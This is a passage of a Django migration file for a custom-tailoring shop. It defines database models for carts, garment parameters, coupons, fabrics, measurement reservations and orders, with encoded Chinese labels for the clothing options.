('xiukou_cs', models.CharField(default=b'', choices=[(b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92', b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92', b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92', b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe5\x8f\xa3\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiabai_cs', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86', b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe4\xb8\x8b\xe6\x91\x86\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('menjin_cs', models.CharField(default=b'', choices=[(b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f', b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x97\xa8\xe8\xa5\x9f\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('houbei_cs', models.CharField(default=b'', choices=[(b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6', b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6'), (b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0', b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe8\x83\x8c\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('koudai_cs', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x8f\xa3\xe8\xa2\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('add_kuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe8\xa3\xa4\xe5\xad\x90')),
('add_majia', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe9\xa9\xac\xe7\x94\xb2')),
('majia_lingxing', models.CharField(default=b'', choices=[(b'V\xe9\xa2\x86', b'V\xe9\xa2\x86'), (b'U\xe9\xa2\x86', b'U\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe9\xa2\x86\xe5\x9e\x8b')),
('majia_kouxing', models.CharField(default=b'', choices=[(b'4', b'4'), (b'5', b'5'), (b'6', b'6'), (b'4*2', b'4*2'), (b'6*3', b'6*3'), (b'8*4', b'8*4')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe6\x89\xa3\xe5\x9e\x8b')),
('add_bespoke', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6Bespoke')),
('add_xiuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe7\xbb\xa3\xe5\xad\x97')),
('xiuzi', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\xbb\xa3\xe5\xad\x97', blank=True)),
('address', models.ForeignKey(verbose_name=b'\xe5\x9c\xb0\xe5\x9d\x80', blank=True, to='wap.Address4Order', null=True)),
],
options={
'verbose_name': '\u8d2d\u7269\u8f66',
'verbose_name_plural': '\u8d2d\u7269\u8f66',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ClothParam',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x8f\x82\xe6\x95\xb0\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('image', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\x9b\xbe\xe7\x89\x87', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('money', models.IntegerField(default=0, null=True, verbose_name=b'\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('isUsed', models.CharField(default=b'0', max_length=2, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xbd\xbf\xe7\x94\xa8', choices=[(b'1', b'\xe5\xb7\xb2\xe4\xbd\xbf\xe7\x94\xa8'), (b'0', b'\xe6\x9c\xaa\xe4\xbd\xbf\xe7\x94\xa8')])),
('type', models.CharField(default=b'shirt', max_length=10, verbose_name=b'\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8\xe7\xb1\xbb\xe5\x9e\x8b', choices=[(b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8'), (b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8'), (b'redpacket', b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\xba\xa2\xe5\x8c\x85\xe4\xbc\x98\xe6\x83\xa0\xe5\x88\xb8')])),
('expire_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('use_time', models.DateTimeField(null=True, verbose_name=b'\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
],
options={
'verbose_name': '\u4f18\u60e0\u5238',
'verbose_name_plural': '\u4f18\u60e0\u5238',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Fabric',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('volume', models.FloatField(null=True, verbose_name=b'\xe6\x95\xb0\xe9\x87\x8f', blank=True)),
('thumbnail_url', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe7\xbc\xa9\xe7\x95\xa5\xe5\x9b\xbe', blank=True)),
('image_url', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe5\xa4\xa7\xe5\x9b\xbe', blank=True)),
('content', models.TextField(null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xe6\x8f\x8f\xe8\xbf\xb0', blank=True)),
('price', models.IntegerField(null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u9762\u6599\u4fe1\u606f',
'verbose_name_plural': '\u9762\u6599\u4fe1\u606f',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HouBeiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u540e\u80cc\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u540e\u80cc\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='HouDouXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u540e\u515c\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u540e\u515c\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KaiQiShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5f00\u6c14\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5f00\u6c14\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KouDaiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u53e3\u888b\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u53e3\u888b\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KouXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u6263\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u6263\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KuJiaoXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u88e4\u811a\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u88e4\u811a\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='KuZheXiKu',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u88e4\u8936\uff08\u897f\u88e4\uff09',
'verbose_name_plural': '\u88e4\u8936\uff08\u897f\u88e4\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='LingXingChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9886\u578b\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u9886\u578b\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='LingXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9886\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u9886\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MaJiaKouXing',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9a6c\u7532\u6263\u578b',
'verbose_name_plural': '\u9a6c\u7532\u6263\u578b',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MaJiaLingXing',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u9a6c\u7532\u9886\u578b',
'verbose_name_plural': '\u9a6c\u7532\u9886\u578b',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='MeasureReservation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reservation_number', models.CharField(max_length=128, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe9\xa2\x84\xe7\xba\xa6\xe5\x8f\xb7', blank=True)),
('phone', models.CharField(max_length=128, null=True, verbose_name=b'\xe9\xa2\x84\xe7\xba\xa6\xe6\x89\x8b\xe6\x9c\xba', blank=True)),
('name', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xa7\x93\xe5\x90\x8d', blank=True)),
('sex', models.CharField(default=b'\xe5\xa5\xb3', choices=[(b'\xe5\xa5\xb3', b'\xe5\xa5\xb3'), (b'\xe7\x94\xb7', b'\xe7\x94\xb7')], max_length=10, blank=True, null=True, verbose_name=b'\xe6\x80\xa7\xe5\x88\xab')),
('weight', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbd\x93\xe9\x87\x8d', blank=True)),
('height', models.FloatField(default=0, null=True, verbose_name=b'\xe8\xba\xab\xe9\xab\x98', blank=True)),
('reservation_time', models.DateTimeField(null=True, verbose_name=b'\xe9\xa2\x84\xe7\xba\xa6\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('address_region', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe6\x89\x80\xe5\x9c\xa8\xe5\xb8\x82\xe5\x8c\xba', blank=True)),
('address_street', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe8\xa1\x97\xe9\x81\x93\xe8\xaf\xa6\xe7\xbb\x86\xe5\x9c\xb0\xe5\x9d\x80', blank=True)),
],
options={
'verbose_name': '\u9884\u7ea6\u91cf\u4f53',
'verbose_name_plural': '\u9884\u7ea6\u91cf\u4f53',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MenJinChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u95e8\u895f\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u95e8\u895f\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='NeiBuDouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5185\u90e8\u515c\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5185\u90e8\u515c\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='NeiBuZaoXingShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u5185\u90e8\u9020\u578b\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u5185\u90e8\u9020\u578b\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order_number', models.CharField(max_length=128, null=True, verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
('order_status', models.CharField(blank=True, max_length=10, null=True, verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95\xe7\x8a\xb6\xe6\x80\x81', choices=[(b'\xe6\x9c\xaa\xe4\xbb\x98\xe6\xac\xbe', b'\xe6\x9c\xaa\xe4\xbb\x98\xe6\xac\xbe'), (b'\xe5\xb7\xb2\xe4\xbb\x98\xe6\xac\xbe', b'\xe5\xb7\xb2\xe4\xbb\x98\xe6\xac\xbe'), (b'\xe5\xae\x9a\xe5\x88\xb6\xe4\xb8\xad', b'\xe5\xae\x9a\xe5\x88\xb6\xe4\xb8\xad'), (b'\xe5\xae\x9a\xe5\x88\xb6\xe5\xae\x8c\xe6\x88\x90', b'\xe5\xae\x9a\xe5\x88\xb6\xe5\xae\x8c\xe6\x88\x90'), (b'\xe9\x85\x8d\xe9\x80\x81\xe4\xb8\xad', b'\xe9\x85\x8d\xe9\x80\x81\xe4\xb8\xad'), (b'\xe5\xb7\xb2\xe4\xba\xa4\xe4\xbb\x98', b'\xe5\xb7\xb2\xe4\xba\xa4\xe4\xbb\x98')])),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('is4friend', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xb8\xba\xe9\x87\x8d\xe8\xa7\x86\xe7\x9a\x84\xe4\xba\xba\xe5\xae\x9a\xe5\x88\xb6')),
('friend_phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x9c\x8b\xe5\x8f\x8b\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('kouxing_sy', models.CharField(default=b'', choices=[(b'1', b'1'), (b'2', b'2'), (b'3', b'3'), (b'2*1', b'2*1'), (b'4*2', b'4*2'), (b'6*2', b'6*2')], max_length=16, blank=True, null=True, verbose_name=b'\xe6\x89\xa3\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('lingxing_sy', models.CharField(default=b'', choices=[(b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('yaodou_sy', models.CharField(default=b'', choices=[(b'\xe6\x99\xae\xe9\x80\x9a', b'\xe6\x99\xae\xe9\x80\x9a'), (b'\xe6\x96\x9c\xe5\x85\x9c', b'\xe6\x96\x9c\xe5\x85\x9c'), (b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c', b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x85\x9c\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kaiqi_sy', models.CharField(default=b'', choices=[(b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94', b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94', b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe6\x97\xa0', b'\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe6\xb0\x94\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('xiukou_sy', models.CharField(default=b'', choices=[(b'3', b'3'), (b'4', b'4')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe6\x89\xa3\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibuzaoxing_sy', models.CharField(default=b'', choices=[(b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe', b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe'), (b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe', b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe9\x80\xa0\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibudou_sy', models.CharField(default=b'', choices=[(b'\xe9\x87\x8c\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c'), (b'\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe5\x85\x9c( \xe5\xa4\x9a\xe9\x80\x89\xe7\x94\xa8 \xe2\x80\x98|\xe2\x80\x99 \xe7\xba\xbf\xe5\x88\x86\xe5\x89\xb2)\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('beizhu_sy', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe4\xb8\x8a\xe8\xa1\xa3\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('libu_sy', models.CharField(default=b'', choices=[(b'\xe9\xbb\x91\xe9\xa1\xba\xef\xbc\x9aK-2', b'\xe9\xbb\x91\xe9\xa1\xba\xef\xbc\x9aK-2'), (b'\xe9\xbb\x91\xe6\x92\x9e\xef\xbc\x9aJ-33', b'\xe9\xbb\x91\xe6\x92\x9e\xef\xbc\x9aJ-33'), (b'\xe8\x93\x9d\xe9\xa1\xba\xef\xbc\x9a#45', b'\xe8\x93\x9d\xe9\xa1\xba\xef\xbc\x9a#45'), (b'\xe8\x93\x9d\xe6\x92\x9e\xef\xbc\x9ak-10', b'\xe8\x93\x9d\xe6\x92\x9e\xef\xbc\x9ak-10'), (b'\xe7\x81\xb0\xe9\xa1\xba\xef\xbc\x9a#40', b'\xe7\x81\xb0\xe9\xa1\xba\xef\xbc\x9a#40'), (b'\xe7\x81\xb0\xe6\x92\x9e\xef\xbc\x9a#57', b'\xe7\x81\xb0\xe6\x92\x9e\xef\xbc\x9a#57')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x87\x8c\xe5\xb8\x83')),
('guomian_sy', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe8\xbf\x87\xe9\x9d\xa2', b'\xe7\x9b\xb4\xe8\xbf\x87\xe9\x9d\xa2'), (b'\xe8\xbf\x9e\xe8\x80\xb3\xe7\x9a\xae', b'\xe8\xbf\x9e\xe8\x80\xb3\xe7\x9a\xae')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xbf\x87\xe9\x9d\xa2')),
('kuzhe_xk', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe8\xa4\xb6', b'\xe6\x97\xa0\xe8\xa4\xb6'), (b'\xe5\x8d\x95\xe8\xa4\xb6', b'\xe5\x8d\x95\xe8\xa4\xb6'), (b'\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe5\x8f\x8c\xe8\xa4\xb6')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\xa4\xb6\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('houdou_xk', models.CharField(default=b'', choices=[(b'\xe5\x8f\xb3\xe8\xbe\xb9', b'\xe5\x8f\xb3\xe8\xbe\xb9'), (b'\xe4\xb8\xa4\xe8\xbe\xb9', b'\xe4\xb8\xa4\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe5\x85\x9c\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('kujiao_xk', models.CharField(default=b'', choices=[(b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9', b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9'), (b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9', b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x84\x9a\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('beizhu_xk', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe8\xa5\xbf\xe8\xa3\xa4\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('lingxing_cs', models.CharField(default=b'', choices=[(b'\xe6\xa0\x87\xe5\x87\x86', b'\xe6\xa0\x87\xe5\x87\x86'), (b'\xe5\x85\xab\xe5\xad\x97', b'\xe5\x85\xab\xe5\xad\x97'), (b'\xe4\xb8\x80\xe5\xad\x97', b'\xe4\xb8\x80\xe5\xad\x97'), (b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86', b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86'), (b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86', b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
